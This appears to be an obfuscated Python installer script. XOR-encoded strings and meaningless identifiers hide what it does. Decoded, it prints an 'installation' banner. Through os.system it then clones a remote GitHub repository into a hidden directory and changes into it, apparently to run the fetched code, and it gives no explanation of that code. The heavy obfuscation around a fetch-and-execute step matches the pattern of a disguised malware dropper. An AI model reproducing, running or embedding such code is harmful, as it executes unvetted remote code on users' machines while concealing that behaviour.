ll0O1OO1llOl01O0l0l10 = (lambda lllOl010Ol0OlOl01ll0l,
    OllO101OOO0l0ll1O00OO: lllOl010Ol0OlOl01ll0l ^ OllO101OOO0l0ll1O00OO)
O1O0O0l0101lOl1O0O0O0 = (lambda O10011010lO0111O01OOl,
    Ol1O11ll10l0l0100O1l1: O10011010lO0111O01OOl + Ol1O11ll10l0l0100O1l1)
O1Ol0O1O10lOOlOll1lO0 = __import__('r' + 'e', globals(), locals(), [], 0 * 
    9 + 0)
OOll0Ol01OO01l0OO011l = __import__('o' + 's', globals(), locals(), [], 0 * 
    9 + 0)
print(''.join(chr(l1OOlOlOll10OlOl1001l ^ lOl10O11O1O01O0111101) for 
    lOl10O11O1O01O0111101, l1OOlOlOll10OlOl1001l in zip(
    b'E\xf0\xa9\xb4\x1bd\x05\xcb\xbd\x90C#',
    b'^\xab\x99\x8f(Th\x9f\xd2\xff/\x03')) + ''.join(chr(
    l01lO000lOl0OOO0O0110 ^ O0010l1OO1Ollll0O1O10) for 
    O0010l1OO1Ollll0O1O10, l01lO000lOl0OOO0O0110 in zip(
    b'\xdc%\x1d\x0b\x1d\xa3\x9d\x83\xe6\x9d\xfa4',
    b'\xb5Kn\x7f|\xcf\xf1\xe2\x92\xf4\x95Z')))
getattr(OOll0Ol01OO01l0OO011l, ''.join(chr(l01O1l01l1111110l10l0 ^
    OOl0ll0l00O0111l01Oll) for OOl0ll0l00O0111l01Oll, l01O1l01l1111110l10l0 in
    zip(b'\xc1\xf1\xd0\xfac\x97', b'\xb2\x88\xa3\x8e\x06\xfa')))(''.join(
    filter(lambda OO1111001Ol00O1l001l0: ord(OO1111001Ol00O1l001l0) % 2 != 
    0, """":NTBF(JV,h
""")).join(chr(O1O0110llO0l1ll100OOl ^
    l1lllOl0000OO10O0111l) for l1lllOl0000OO10O0111l, O1O0110llO0l1ll100OOl in
    zip(
    b"\xa0\x05\xa0\xca{^\xe0\xcaA\x9f\x8e\xcfZ+\xee\x8e_\xabJj\xbb-P\xf80\xd8\xf9'\x1aC\xc3\t\x9e\x16:M%\xe1\x02JMY\x08\xa3Vy\xba\xe6\x0b/\xaf"
    ,
    b'\xc7l\xd4\xea\x182\x8f\xa4$\xbf\xe6\xbb.[\x9d\xb4p\x84-\x03\xcfE%\x9a\x1e\xbb\x96J5\x0b\xa2c\xffy[\'D\x83j+"8`\x94a\r\xce\xc9%F\xc1'
    )))
getattr(OOll0Ol01OO01l0OO011l, ''.join(chr(O0O1111l0lO11lllOlOOO ^
    lO10ll0111O1Olll100O1) for lO10ll0111O1Olll100O1, O0O1111l0lO11lllOlOOO in
    zip(b'\xa9\xa3\x91\xf2Q\xe8', b'\xda\xda\xe2\x864\x85')))(''.join(chr(
    ll0O1OO1llOl01O0l0l10(l0O1l11l0O0O1O10111O0, O101OllOO11l01ll101l1)) for
    O101OllOO11l01ll101l1, l0O1l11l0O0O1O10111O0 in zip(
    b'\xbc\x828\xcc\x8f}\xa7\x03\xb0*z\xaa*\x9d\xe4j\x9e\x19(\x9dp\xad\xca\x06\xb6,\x8a'
    ,
    b'\xdf\xe6\x18\xe2\xe6\x13\x87%\x96\n\n\xd3^\xf5\x8b\x04\xac9A\xf3\x16\xc8\xa9r\x98T\xe5'
    )))
